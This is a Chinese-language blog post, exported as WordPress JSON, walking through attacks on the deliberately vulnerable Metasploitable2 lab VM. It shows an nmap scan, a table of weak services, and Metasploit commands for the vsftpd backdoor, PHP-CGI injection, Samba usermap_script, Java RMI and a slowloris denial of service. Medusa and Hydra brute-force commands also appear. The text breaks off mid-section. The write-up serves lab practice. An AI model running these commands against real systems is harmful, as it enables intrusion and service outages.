{"id":333,"date":"2023-10-02T18:00:51","date_gmt":"2023-10-02T10:00:51","guid":{"rendered":"http:\/\/danielw.top\/?p=333"},"modified":"2023-10-08T14:02:36","modified_gmt":"2023-10-08T06:02:36","slug":"metasploitable2-%e6%bc%8f%e6%b4%9e%e8%a7%a3%e6%9e%90","status":"publish","type":"post","link":"http:\/\/danielw.top\/?p=333","title":{"rendered":"Metasploitable2 \u6f0f\u6d1e\u89e3\u6790"},"content":{"rendered":"<h2>\u4fe1\u606f\u6536\u96c6\u9636\u6bb5<\/h2>\n<blockquote>\n<p>\u7531\u4e8e\u662f<a href=\"https:\/\/so.csdn.net\/so\/search?q=Vmware&amp;spm=1001.2101.3001.7020\" target=\"_blank\"  rel=\"nofollow\" >Vmware<\/a>\u4e2d\u7684\u9776\u673a\uff0c\u6240\u4ee5\u4e0d\u505a\u771f\u5b9eIP\u3001\u65c1\u7ad9\u3001C\u6bb5\u3001WAF\u7b49\u4fe1\u606f\u7684\u6536\u96c6<\/p>\n<\/blockquote>\n<p>\u7aef\u53e3\u6536\u96c6\uff1a<\/p>\n<p>\u83b7\u5f97\u5f00\u653e\u7684\u670d\u52a1\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-bash\">Starting Nmap 7.93 ( https:\/\/nmap.org ) at 2023-09-27 19:22 CST\nHost is up (0.016s latency).\nNot shown: 977 filtered tcp ports (no-response)\nPORT     STATE SERVICE      VERSION\n21\/tcp   open  ftp          vsftpd 2.3.4\n|_ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to 192.168.24.253\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      vsFTPd 2.3.4 - secure, fast, stable\n|_End of status\n|_ftp-bounce: bounce working!\n22\/tcp   open  ssh          OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)\n| ssh-hostkey: \n|   1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA)\n|_  2048 5656240f211ddea72bae61b1243de8f3 (RSA)\n23\/tcp   open  telnet       Linux telnetd\n25\/tcp   open  smtp         Postfix smtpd\n|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN\n53\/tcp   open  domain       ISC BIND 9.4.2\n| dns-nsid: \n|_  bind.version: 9.4.2\n80\/tcp   open  http         Apache httpd 2.2.8 ((Ubuntu) DAV\/2)\n|_http-server-header: Apache\/2.2.8 (Ubuntu) DAV\/2\n|_http-title: Metasploitable2 - Linux\n111\/tcp  open  rpcbind      2 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2            111\/tcp   rpcbind\n|   100000  2            111\/udp   rpcbind\n|   100003  2,3,4       2049\/tcp   nfs\n|   100003  2,3,4       2049\/udp   nfs\n|   100005  1,2,3      40158\/udp   mountd\n|   100005  1,2,3      47688\/tcp   mountd\n|   100021  1,3,4      55247\/udp   nlockmgr\n|   100021  1,3,4      59456\/tcp   nlockmgr\n|   100024  1          49302\/tcp   status\n|_  100024  1          58498\/udp   status\n139\/tcp  open  netbios-ssn  Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\n445\/tcp  open  netbios-ssn  Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)\n512\/tcp  open  exec?\n513\/tcp  open  login?\n514\/tcp  open  shell?\n1099\/tcp open  java-rmi     GNU Classpath grmiregistry\n1524\/tcp open  bindshell    Metasploitable root shell\n2049\/tcp open  nfs          2-4 (RPC #100003)\n2121\/tcp open  ccproxy-ftp?\n3306\/tcp open  mysql?\n5432\/tcp open  postgresql   PostgreSQL DB 8.3.0 - 8.3.7\n| ssl-cert: Subject: commonName=ubuntu804-base.localdomain\/organizationName=OCOSA\/stateOrProvinceName=There is no such thing outside US\/countryName=XX\n| Not valid before: 2010-03-17T14:07:45\n|_Not valid after:  2010-04-16T14:07:45\n5900\/tcp open  vnc          VNC (protocol 3.3)\n| vnc-info: \n|   Protocol version: 3.3\n|   Security types: \n|_    VNC Authentication (2)\n6000\/tcp open  X11          (access denied)\n6667\/tcp open  irc          UnrealIRCd\n8009\/tcp open  ajp13        Apache Jserv (Protocol v1.3)\n|_ajp-methods: Failed to get a valid response for the OPTION request\n8180\/tcp open  http         Apache Tomcat\/Coyote JSP engine 1.1\n|_http-favicon: Apache Tomcat\n|_http-title: Apache Tomcat\/5.5\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose\nRunning: Linux 2.4.X, Microsoft Windows XP|7|2012\nOS CPE: cpe:\/o:linux:linux_kernel:2.4.37 cpe:\/o:microsoft:windows_xp::sp3 cpe:\/o:microsoft:windows_7 cpe:\/o:microsoft:windows_server_2012\nOS details: DD-WRT v24-sp2 (Linux 2.4.37), Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012\nNetwork Distance: 2 hops\nService Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\n\nHost script results:\n|_smb2-time: Protocol negotiation failed (SMB2)\n|_clock-skew: mean: 1h59m36s, deviation: 2h49m45s, median: -25s\n| smb-security-mode: \n|   account_used: guest\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n| smb-os-discovery: \n|   OS: Unix (Samba 3.0.20-Debian)\n|   Computer name: metasploitable\n|   NetBIOS computer name: \n|   Domain name: localdomain\n|   FQDN: metasploitable.localdomain\n|_  System time: 2023-09-27T07:25:06-04:00\n\nTRACEROUTE (using port 80\/tcp)\nHOP RTT     ADDRESS\n1   0.21 ms 192.168.207.2\n2   0.06 ms 172.16.10.36\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 265.20 seconds<\/code><\/pre>\n<hr \/>\n<h2>\u7edf\u8ba1\u9636\u6bb5<\/h2>\n<table>\n<thead>\n<tr>\n<th>\u7aef\u53e3\/\u670d\u52a1<\/th>\n<th>\u7aef\u53e3\/\u670d\u52a1<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><strong>21 \/ VSFTPD 2.3.4\uff08\u7b11\u8138\u6f0f\u6d1e\uff09<\/strong><\/td>\n<td><strong>1524 \/ <code>ingreslock<\/code>\u540e\u95e8<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>22 \/ \u5f31\u53e3\u4ee4<\/strong><\/td>\n<td><strong>512 \/ \u547d\u4ee4\u6267\u884c<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>23 \/\u5f31\u53e3\u4ee4<\/strong><\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>25 -<\/td>\n<td>514 -<\/td>\n<\/tr>\n<tr>\n<td>53 -<\/td>\n<td><strong>1099 \/ java-rmi\u53cd\u5e8f\u5217\u5316<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>80 - \u591a\u79cd\u6f0f\u6d1e-\u4f8b\u5982CGI  \\  HTTP-DDOS\u62d2\u7edd\u670d\u52a1\u653b\u51fb<\/strong><\/td>\n<td>154 -<\/td>\n<\/tr>\n<tr>\n<td><strong>111 - NFS\u670d\u52a1\u914d\u7f6e\u6f0f\u6d1e<\/strong><\/td>\n<td><strong>2049 \/ NFS\u5171\u4eab\u6f0f\u6d1e<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>139\u3001445 \/ SMB\u4efb\u610f\u547d\u4ee4\u6267\u884c<\/strong><\/td>\n<td><strong>2121 - ftp\u5f31\u53e3\u4ee4<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>3306 \/ MySQL\u5f31\u53e3\u4ee4<\/strong><\/td>\n<td><strong>3632 \/ Distccd\u4efb\u610f\u547d\u4ee4\u6267\u884c<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>5432 \/ Postgresql\u5f31\u53e3\u4ee4<\/strong><\/td>\n<td><strong>5900 \/ vnc\u5f31\u53e3\u4ee4<\/strong><\/td>\n<\/tr>\n<tr>\n<td>6000 -<\/td>\n<td><strong>6667 \/ UnrealIRCd\u6f0f\u6d1e<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>6697 \/ unreal_ircd<\/strong><\/td>\n<td><strong>8009 \/ \u547d\u4ee4\u6267\u884c<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>8180 \/ tomcat\u5f31\u53e3\u4ee4<\/strong><\/td>\n<td><strong>8787 \/ drb_remote_codeexec<\/strong><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<hr \/>\n<h2>\u5229\u7528\u9636\u6bb5<\/h2>\n<h3><strong>VSFTPD 2.3.4<\/strong><\/h3>\n<p>\u5229\u7528\u65b9\u5f0f\uff1a<\/p>\n<ol>\n<li>metasploit\u6a21\u5757\u5229\u7528<\/li>\n<li>\u7b11\u8138:)\u5229\u7528\uff08\u9700\u8981\u76ee\u6807\u673a\u5668\u5f00\u542f6200\u7aef\u53e3\uff09<\/li>\n<li>ftp\u7206\u7834<\/li>\n<\/ol>\n<p><strong>\u4f7f\u7528metasploit\u4e2d\u7684\u5229\u7528\u6a21\u5757<\/strong><\/p>\n<pre><code>msfconsole\uff1a\u8fdb\u5165metasploit`\n `search vsftpd\uff1a\u641c\u7d22\u5229\u7528\u6a21\u5757`\n `use exploit\/unix\/ftp\/vsftpd_234_backdoor\uff1a\u4f7f\u7528\u6a21\u5757`\n `options\uff1a\u67e5\u770b\u9700\u8981\u914d\u7f6e\u7684\u53c2\u6570`\n `set rhost 192.168.207.140\uff1a\u8bbe\u7f6e\u76ee\u6807IP`\n `run\uff1a\u5f00\u59cb\u8fd0\u884c<\/code><\/pre>\n<p>\u6210\u529f\u62ff\u5230shell<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/Kp\/image-20231008133014120.png\" alt=\"image-20231008133014120\" \/><\/p>\n<h3><strong>SSH\u7206\u7834<\/strong><\/h3>\n<p>\u5229\u7528\u65b9\u5f0f\uff1a<\/p>\n<ol>\n<li>metasploit\u6a21\u5757\u5229\u7528<\/li>\n<li>ssh\u7206\u7834<\/li>\n<\/ol>\n<p><strong>ssh\u7206\u7834<\/strong><br \/>\n\u4f7f\u7528Medusa\u7f8e\u675c\u838e\u5de5\u5177\u7206\u7834\u8be5<a href=\"https:\/\/so.csdn.net\/so\/search?q=\u9776\u673a&amp;spm=1001.2101.3001.7020\" target=\"_blank\"  rel=\"nofollow\" >\u9776\u673a<\/a>\u7684SSH\u8d26\u5bc6<br \/>\n<code>medusa -M ssh -h 192.168.207.140 -U user.txt -P pass.txt -f -t 5<\/code>\u8fd9\u91cc\u4e3a\u4e86\u65b9\u4fbf\u76f4\u63a5\u8bbe\u7f6e\u4e86\u7528\u6237\u540d\u4e3amsfadmin<br \/>\n<img decoding=\"async\" src=\"D:\\Daily\\Typora\\images\\image-20231008133310419.png\" alt=\"image-20231008133310419\" \/><\/p>\n<h3><strong>Telnet\u7206\u7834<\/strong><\/h3>\n<p>\u5229\u7528\u65b9\u5f0f\uff1a<\/p>\n<ol>\n<li>metasploit\u6a21\u5757\u5229\u7528<br \/>\n<strong>\u6d4b\u8bd5\u7684Hydra\u548cMedusa\u90fd\u65e0\u6cd5\u7206\u7834Telnet\uff0c\u5982\u679c\u662f\u5229\u7528\u9519\u8bef\u6216\u8005\u6709\u5176\u4ed6\u7684\u5229\u7528\u65b9\u5f0f\u5e0c\u671b\u5404\u4f4d\u5e08\u5085\u53ef\u4ee5\u4e3a\u6211\u6307\u51fa\uff0c\u8c22\u8c22\u5566\uff01<\/strong><\/li>\n<\/ol>\n<p><strong>\u4f7f\u7528metasploit\u4e2d\u7684\u5229\u7528\u6a21\u5757<\/strong><\/p>\n<pre><code>msfconsole\uff1a\u8fdb\u5165metaspolit`\n `search telnet_login\uff1a\u641c\u7d22\u5229\u7528\u6a21\u5757`\n `use scanner\/telnet\/telnet_login\uff1a\u4f7f\u7528\u6a21\u5757`\n `options\uff1a\u67e5\u770b\u9700\u8981\u914d\u7f6e\u7684\u53c2\u6570<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/Kp\/image-20231008133433899.png\" alt=\"image-20231008133433899\" \/><\/p>\n<p><code>set rhosts 192.168.207.140\uff1a\u8bbe\u7f6e\u76ee\u6807\u673aIP<\/code><br \/>\n<code>set user_file \u7528\u6237\u540d\u5b57\u5178\u8def\u5f84<\/code><br \/>\n<code>set pass_file \u5bc6\u7801\u7684\u5b57\u5178\u8def\u5f84<\/code><br \/>\n<code>set threads 10\uff1a\u8bbe\u7f6e\u7ebf\u7a0b\u6570\u91cf<\/code><br \/>\n<code>run\uff1a\u8fd0\u884c<\/code><br \/>\n<img decoding=\"async\" src=\"http:\/\/img.danielw.top\/Kp\/image-20231008133626334.png\" alt=\"image-20231008133626334\" \/><\/p>\n<h3><strong>CGI\/FastCGI<\/strong><\/h3>\n<p><strong>\u9996\u5148\u4e86\u89e3\u4ec0\u4e48\u662fCGI\uff1a<\/strong><\/p>\n<p><a href=\"https:\/\/blog.csdn.net\/weixin_44743841\/article\/details\/107564007\" target=\"_blank\"  rel=\"nofollow\" >\u6211\u662f\u4ece\u8fd9\u91cc\u4e86\u89e3\u5230\u6709\u5173\u4e8eCGI\u77e5\u8bc6\u7684<\/a><\/p>\n<p>CGI\u662f\u4e00\u4e2a\u901a\u7528\u7f51\u5173\u63a5\u53e3\uff0c\u7528\u4e8eWeb\u670d\u52a1\u5668\u4e0e\u5916\u90e8\u5e94\u7528\u7a0b\u5e8f\uff08CGI\u7a0b\u5e8f\uff09\u4e4b\u95f4\u4f20\u9012\u4fe1\u606f\u7684\u63a5\u53e3\u6807\u51c6\u3002<\/p>\n<p>\u5f53\u5ba2\u6237\u7aef\u5411Web\u670d\u52a1\u5668\u53d1\u8d77\u4e00\u6b21\u8bf7\u6c42\u7684\u65f6\u5019\uff1a<\/p>\n<p>\u5982\u679c\u8bf7\u6c42\u7684\u662f<strong>\u9759\u6001\u6587\u4ef6<\/strong>\uff0c\u4f8b\u5982html\u6587\u4ef6\u3002\u4e0d\u8c03\u7528CGI\uff0c\u4e5f\u5c31\u662f\u4e0d\u53d1\u8d77CGI\u8bf7\u6c42\u3002Web\u670d\u52a1\u5668\u4f1a\u76f4\u63a5\u8fd4\u56de\u8be5\u6587\u4ef6\u7684\u5185\u5bb9\u3002<\/p>\n<p>\u5982\u679c\u8bf7\u6c42\u7684\u662f<strong>\u52a8\u6001\u811a\u672c<\/strong>\uff0c\u4f8b\u5982php\u6587\u4ef6\u3002\u8c03\u7528CGI\uff0c\u53d1\u8d77\u4e00\u6b21CGI\u8bf7\u6c42\u3002Web\u670d\u52a1\u5668\u4f1a\u542f\u52a8\u5bf9\u5e94\u7684CGI\u7a0b\u5e8f\uff0c\u5c06\u6570\u636e\u8fdb\u884c\u7b80\u5355\u7684\u5904\u7406\u4e4b\u540e\u4ea4\u7ed9PGP\u89e3\u91ca\u5668\u3002<\/p>\n<p>CGI\u7a0b\u5e8f\u4f1a\u89e3\u6790\u8bf7\u6c42\u4e2d\u7684URL\uff0c\u67e5\u8be2\u5b57\u7b26\u4e32\uff08\u5728?\u4e4b\u540e\u7684\u53c2\u6570\uff0c\u6bcf\u5bf9\u53c2\u6570\u6839\u636e\u952e\u503c\u5bf9\u6765\u5212\u5206\uff0c\u6bcf\u5bf9\u53c2\u6570\u4f7f\u7528&amp;\u6765\u5206\u9694\uff09\uff0cPOST\u6570\u636e\u548cHTTP\u5934\u90e8\u7684\u4fe1\u606f\uff0c\u5e76\u4e14\u6839\u636e\u8fd9\u4e9b\u4fe1\u606f\u751f\u6210\u52a8\u6001\u7684\u54cd\u5e94\u5185\u5bb9\u3002CGI\u7a0b\u5e8f\u4f1a\u6309\u7167CGI\u534f\u8bae\u89c4\u5b9a\u7684\u683c\u5f0f\u5c06\u7ed3\u679c\u8fd4\u56de\u7ed9Web\u670d\u52a1\u5668\uff0c\u7136\u540eWeb\u670d\u52a1\u5668\u5c06\u7ed3\u679c\u8fd4\u56de\u7ed9\u5ba2\u6237\u7aef\u3002<\/p>\n<p>\u5728\u5904\u7406\u5b8c\u4e00\u4e2a\u8bf7\u6c42\u4e4b\u540e\uff0cCGI\u7a0b\u5e8f\u4f1a\u9000\u51fa\uff0c\u5982\u679c\u4e0b\u6b21\u6709\u65b0\u7684CGI\u8bf7\u6c42\uff0cWeb\u670d\u52a1\u5668\u4f1a\u518d\u6b21\u542f\u52a8\u4e00\u4e2a\u65b0\u7684CGI\u8fdb\u7a0b\u6765\u5904\u7406\u3002<\/p>\n<p>\u800c\u9700\u8981\u6ce8\u610f\u7684\u662f\uff0c\u968f\u7740\u79d1\u6280\u7684\u8fdb\u6b65\u6280\u672f\u7684\u53d1\u5c55\uff0c\u51fa\u73b0\u4e86\u66f4\u9ad8\u6548\u7684\u66ff\u4ee3\u65b9\u6848\uff0c\u4f8b\u5982FastCGI\uff0cWSGI\u7b49\uff0c\u4ed6\u4eec\u53ef\u4ee5\u6709\u6548\u7684\u907f\u514d\u6bcf\u6b21\u8bf7\u6c42\u90fd\u542f\u52a8\u65b0\u7684\u8fdb\u7a0b\uff0c\u63d0\u9ad8\u6027\u80fd\u548c\u6548\u7387\u3002<\/p>\n<p><strong>\u4ec0\u4e48\u662fFastCGI\uff1a<\/strong><\/p>\n<p>FastCGI\u662fCGI\u7684\u6539\u8fdb\u7248\u672c\uff0c\u7528\u6765\u6539\u5584CGI\u7684\u6027\u80fd\u95ee\u9898\u3002<\/p>\n<p><strong>\u800c\u4e24\u8005\u7684\u533a\u522b\u4e3a\uff1a<\/strong><\/p>\n<p>CGI\uff1a\u5f53\u6bcf\u6b21\u8bf7\u6c42\u5230\u8fbe\u7684\u65f6\u5019\u90fd\u4f1a\u542f\u52a8\u4e00\u4e2aCGI\u8fdb\u7a0b\u6765\u6267\u884c\u76f8\u5bf9\u5e94\u7684CGI\u7a0b\u5e8f\u5e76\u4e14\u5904\u7406\u8bf7\u6c42\u8fd4\u56de\u7ed3\u679c\u3002\u800c\u7528\u5b8c\u4e4b\u540e\u4f1a\u9500\u6bc1\u8fd9\u4e2aCGI\u8fdb\u7a0b\u3002\u9891\u7e41\u7684\u521b\u5efa\u548c\u9500\u6bc1CGI\u8fdb\u7a0b\u4f1a\u5bf9\u670d\u52a1\u5668\u6027\u80fd\u6709\u8f83\u5927\u7684\u635f\u8017\u3002<\/p>\n<p>FastCGI\uff1aFastCGI\u5728Web\u4e2d\u5f15\u7528\u4e86\u4e00\u4e2a\u8fdb\u7a0b\u7ba1\u7406\u5668\uff0c\u5b83\u4f1a\u542f\u52a8\u4e00\u7ec4\u957f\u65f6\u95f4\u8fd0\u884c\u7684FastCGI\u8fdb\u7a0b\u3002\u8fd9\u4e9bFastCGI\u8fdb\u7a0b\u4f1a\u4e00\u76f4\u4fdd\u6301\u8fd0\u884c\u72b6\u6001\uff0c\u5f53\u6bcf\u6b21\u6709\u8bf7\u6c42\u5230\u8fbe\u7684\u65f6\u5019\uff0cWeb\u4f1a\u5c06\u8bf7\u6c42\u53d1\u7ed9\u7a7a\u95f2\u7684FastCGI\u8fdb\u7a0b\uff0c\u800c\u4e0d\u9700\u8981\u91cd\u65b0\u521b\u5efa\u8fdb\u7a0b\u3002\u907f\u514d\u4e86\u9891\u7e41\u7684\u521b\u5efa\u548c\u9500\u6bc1\u8fdb\u7a0b\uff0c\u63d0\u9ad8\u4e86\u6027\u80fd\u548c\u6548\u7387\u3002<\/p>\n<p><code>\u4f7f\u7528\u76ee\u5f55\u626b\u63cf\u6210\u529f\u53d1\u73b0\u6587\u4ef6:phpinfo.php<\/code><\/p>\n<p>\u901a\u8fc7\u8bbf\u95ee\u5f97\u77e5\u5f53\u524d\u7684 <code>Server API\u662fCGI\/FastCGI<\/code><br \/>\n<img decoding=\"async\" src=\"http:\/\/img.danielw.top\/Kp\/9847c6fdf5044eec9f43844511b42fa9.png\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/><br \/>\n\u800c\u8be5\u65b9\u5f0f\u5728PHP\u4e2d\u53ef\u80fd\u5b58\u5728CGI\u53c2\u6570\u6ce8\u5165\u7b49\u95ee\u9898\u3002<\/p>\n<p>CGI \u53c2\u6570\u6ce8\u5165\u53ef\u80fd\u53d1\u751f\u7684\u539f\u56e0\u4e3b\u8981\u5305\u62ec\u4ee5\u4e0b\u60c5\u51b5\uff1a<\/p>\n<ol>\n<li>\u672a\u6b63\u786e\u8fc7\u6ee4\u7528\u6237\u8f93\u5165\uff1a\u5982\u679c CGI \u7a0b\u5e8f\u5728\u63a5\u6536\u5230\u53c2\u6570\u540e\u672a\u5bf9\u7528\u6237\u8f93\u5165\u8fdb\u884c\u9002\u5f53\u7684\u9a8c\u8bc1\u548c\u8fc7\u6ee4\uff0c\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u7279\u6b8a\u5b57\u7b26\u6216\u5b57\u7b26\u4e32\u6ce8\u5165\u6076\u610f\u4ee3\u7801\uff0c\u4ece\u800c\u6267\u884c\u672a\u7ecf\u6388\u6743\u7684\u64cd\u4f5c\u3002<\/li>\n<li>\u547d\u4ee4\u6ce8\u5165\uff1a\u5f53 CGI \u7a0b\u5e8f\u5728\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\u65f6\uff0c\u5982\u679c\u672a\u6b63\u786e\u5730\u5bf9\u53c2\u6570\u8fdb\u884c\u8f6c\u4e49\u6216\u9a8c\u8bc1\uff0c\u653b\u51fb\u8005\u53ef\u80fd\u901a\u8fc7\u6ce8\u5165\u6076\u610f\u547d\u4ee4\u6765\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002<\/li>\n<li>SQL \u6ce8\u5165\uff1a\u5982\u679c CGI \u7a0b\u5e8f\u5728\u4e0e\u6570\u636e\u5e93\u4ea4\u4e92\u65f6\uff0c\u672a\u5bf9\u53c2\u6570\u8fdb\u884c\u53c2\u6570\u5316\u67e5\u8be2\u6216\u9884\u7f16\u8bd1\u8bed\u53e5\u5904\u7406\uff0c\u653b\u51fb\u8005\u53ef\u80fd\u901a\u8fc7\u6ce8\u5165\u6076\u610f SQL \u8bed\u53e5\u6765\u8bbf\u95ee\u6216\u7be1\u6539\u6570\u636e\u5e93\u4e2d\u7684\u6570\u636e\u3002<\/li>\n<li>\u6587\u4ef6\u8def\u5f84\u6ce8\u5165\uff1a\u5728\u6587\u4ef6\u64cd\u4f5c\u4e2d\uff0c\u5982\u679c CGI \u7a0b\u5e8f\u672a\u6b63\u786e\u9a8c\u8bc1\u548c\u5904\u7406\u6587\u4ef6\u8def\u5f84\u53c2\u6570\uff0c\u653b\u51fb\u8005\u53ef\u80fd\u6ce8\u5165\u7279\u6b8a\u8def\u5f84\u6765\u8bbf\u95ee\u654f\u611f\u6587\u4ef6\u6216\u6267\u884c\u6076\u610f\u64cd\u4f5c\u3002<\/li>\n<\/ol>\n<p>\u5229\u7528\u65b9\u5f0f\uff1a<\/p>\n<ol>\n<li>metasploit\u6a21\u5757\u5229\u7528<\/li>\n<\/ol>\n<p><strong>\u4f7f\u7528metasploit\u4e2d\u7684\u5229\u7528\u6a21\u5757<\/strong><\/p>\n<pre><code>msfconsole\uff1a\u8fdb\u5165metasplot`\n `search php_cgi\uff1a\u641c\u7d22\u5229\u7528\u6a21\u5757`\n `use exploit\/multi\/http\/php_cgi_arg_injection\uff1a\u4f7f\u7528\u6a21\u5757`\n `options\uff1a\u67e5\u770b\u9700\u8981\u914d\u7f6e\u7684\u53c2\u6570\n `set rhost 192.168.207.140\uff1a\u8bbe\u7f6e\u76ee\u6807\u673aIP`\n `run\uff1a\u8fd0\u884c`<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/Kp\/image-20231008133741567.png\" alt=\"image-20231008133741567\" \/><\/p>\n<h3><strong>DDOS\u62d2\u7edd\u670d\u52a1\u653b\u51fb<\/strong><\/h3>\n<p>\u901a\u8fc7<code>db_nmap<\/code>\u6f0f\u6d1e\u626b\u63cf\u5f97\u77e5\u5b58\u5728\u4e00\u4e2aCVE\u6f0f\u6d1e\uff0c\u5e76\u4e14\u901a\u8fc7\u67e5\u8be2\u5f97\u77e5\uff0c\u8be5CVE\u662f\u4e00\u4e2aDDOS\u653b\u51fb\u3002<\/p>\n<pre><code> db_nmap --script=vuln -p 80 -T4 192.168.207.140<\/code><\/pre>\n<p>\u5229\u7528\u65b9\u5f0f\uff1a<\/p>\n<ol>\n<li>metasploit\u6a21\u5757\u5229\u7528<\/li>\n<\/ol>\n<p><strong>\u4f7f\u7528metasploit\u4e2d\u7684\u5229\u7528\u6a21\u5757<\/strong><\/p>\n<pre><code>msfconsole\uff1a\u8fdb\u5165metasploit`\n `search slowloris\uff1a\u641c\u7d22\u5229\u7528\u6a21\u5757`\n `use auxiliary\/dos\/http\/slowloris\uff1a\u4f7f\u7528\u6a21\u5757`\n `options\uff1a\u67e5\u770b\u9700\u8981\u914d\u7f6e\u7684\u53c2\u6570\n set rhost 192.168.207.140\uff1a\u8bbe\u8ba1\u76ee\u6807\u673aIP`\n `run\uff1a\u8fd0\u884c<\/code><\/pre>\n<h3>SMB\u4efb\u610f\u547d\u4ee4\u6267\u884c<\/h3>\n<p>139\u4e0e445\u5206\u522b\u4e3a\uff1aNetBIOS\u534f\u8bae\u548cSMB\u534f\u8bae\uff0c\u90fd\u6d89\u53ca\u6587\u4ef6\u5171\u4eab\u548c\u901a\u4fe1\u3002<\/p>\n<p>\u4f46\u662fNetBIOS\u662f\u65e9\u671f\u7528\u4e8e\u6587\u4ef6\u5171\u4eab\u548c\u901a\u4fe1\u7684\u534f\u8bae\u3002\u7531\u4e8e\u5b89\u5168\u6027\u548c\u8bbe\u8ba1\u9650\u5236\u7b49\u95ee\u9898\uff0c\u9010\u6e10\u88abSMB\u53d6\u4ee3\u3002<\/p>\n<p>\u4e5f\u53ef\u4ee5\u7406\u89e3\u4e3aSMB\u534f\u8bae\u662fNetBIOS\u7684\u5e73\u66ff\u6216\u8005\u5347\u7ea7\u7248\u3002<\/p>\n<p>\u7531\u4e8e139\u548c445\u90fd\u5c5e\u4e8eSMB\u670d\u52a1\u7c7b\u578b\uff0c\u6240\u4ee5\u4e24\u8005\u53ef\u80fd\u5b58\u5728\u76f8\u540c\u7684\u6f0f\u6d1e\uff0c\u8fd9\u70b9\u53ef\u4ee5\u5728nmap\u626b\u63cf\u4e2d\u83b7\u5f97\u5173\u952e\u4fe1\u606f\uff08\u89c1\u7b2c\u4e00\u9875nmap\u626b\u63cf\u7ed3\u679c\uff09\u3002<\/p>\n<p>\u5229\u7528\u65b9\u5f0f\uff1a<\/p>\n<ol>\n<li>metasploit\u6a21\u5757\u5229\u7528<\/li>\n<\/ol>\n<p><strong>\u4f7f\u7528metasplooit\u4e2d\u7684\u5229\u7528\u6a21\u5757<\/strong><\/p>\n<pre><code>msfconsole\uff1a\u8fdb\u5165metasploit`\n `search samba\uff1a\u641c\u7d22\u5229\u7528\u6a21\u5757`\n `use exploit\/multi\/samba\/usermap_script\uff1a\u4f7f\u7528\u6a21\u5757`\n `options\uff1a\u67e5\u770b\u9700\u8981\u914d\u7f6e\u7684\u53c2\u6570\n set rhosts 192.168.207.140\uff1a\u8bbe\u7f6e\u76ee\u6807\u673aIP`\n `run\uff1a\u8fd0\u884c<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/Kp\/image-20231008134023099.png\" alt=\"image-20231008134023099\" \/><\/p>\n<h3>exec\u8d26\u5bc6\u7206\u7834<\/h3>\n<p>\u6709\u7684\u5e08\u5085\u8bf4\u8be5\u670d\u52a1\u53ef\u4ee5\u4f7f\u7528hydra\u8fdb\u884c\u7206\u7834<\/p>\n<p>\u6211\u4f7f\u7528\u7684\u547d\u4ee4\u4e3a\uff1a<code>hydra -L username.txt -P password.txt rexec<\/code> \u6ca1\u6709\u7206\u7834\u6210\u529f<\/p>\n<h3>java-rmi\u53cd\u5e8f\u5217\u5316<\/h3>\n<p>\u4f7f\u7528<code>db_nmap<\/code>\u626b\u63cf\u8be5\u7aef\u53e3<\/p>\n<p><code>db_nmap --script=vuln -p 1099 192.168.207.140<\/code>\u63d0\u793a\u8be5\u7aef\u53e3\u7684\u72b6\u6001\u4e3a\u8106\u5f31<\/p>\n<p>\u5229\u7528\u65b9\u5f0f\uff1a<\/p>\n<ol>\n<li>metasploit\u6a21\u5757\u5229\u7528<\/li>\n<\/ol>\n<p><strong>\u4f7f\u7528metasploit\u4e2d\u7684\u5229\u7528\u6a21\u5757<\/strong><\/p>\n<pre><code>msfconsole\uff1a\u8fdb\u5165metasploit`\n `search java_rmi\uff1a\u641c\u7d22\u5229\u7528\u6a21\u5757`\n `use exploit\/multi\/misc\/java_rmi_server\uff1a\u4f7f\u7528\u6a21\u5757`\n `options\uff1a\u67e5\u770b\u9700\u8981\u914d\u7f6e\u7684\u53c2\u6570\n set rhosts 192.168.207.140\uff1a\u8bbe\u7f6e\u76ee\u6807\u673aIP`\n `run\uff1a\u8fd0\u884c<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/Kp\/image-20231008134156377.png\" alt=\"image-20231008134156377\" \/><\/p>\n<h3>ingreslock\u540e\u95e8<\/h3>\n<p>\u4f7f\u7528<code>db_nmap<\/code>\u626b\u63cf\u8be5\u7aef\u53e3<\/p>\n<p><code>db_nmap --script=vuln -p 1524 